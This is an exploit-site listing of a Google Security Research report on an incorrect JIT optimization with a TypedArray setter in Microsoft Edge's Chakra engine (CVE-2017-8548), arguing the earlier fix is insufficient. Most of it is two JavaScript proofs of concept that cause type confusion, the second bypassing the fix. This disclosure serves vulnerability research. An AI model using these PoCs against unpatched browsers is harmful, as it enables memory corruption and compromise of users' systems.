Lucene search

K
zdtGoogle Security Research1337DAY-ID-28288
HistoryAug 17, 2017 - 12:00 a.m.

Microsoft Edge Chakra Incorrect Jit Optimization Exploit

2017-08-1700:00:00
Google Security Research
0day.today
19

0.945 High

EPSS

Percentile

99.0%

This is a follow-up finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient.

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2

CVE-2017-8548


I think the fix for #1045 is incorrect.

Here's the original PoC.

'use strict';

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c;
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    var a = [1.1, 2.2];
    var b = new Uint32Array(100);

    // force to optimize
    for (var i = 0; i < 0x10000; i++)
        func(a, b, i);

    func(a, b, {valueOf: () => {
        a[0] = {};

        return 0;
    }});

    a[0].toString();
}

main();


I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.

PoC:
'use strict';

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c;
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    var a = [1.1, 2.2];
    var b = new Uint32Array(0);  // <<--------- 100 -> 0

    // force to optimize
    for (var i = 0; i < 0x10000; i++)
        func(a, b, i);

    func(a, b, {valueOf: () => {
        a[0] = {};

        return 0;
    }});

    a[0].toString();
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

#  0day.today [2018-04-09]  #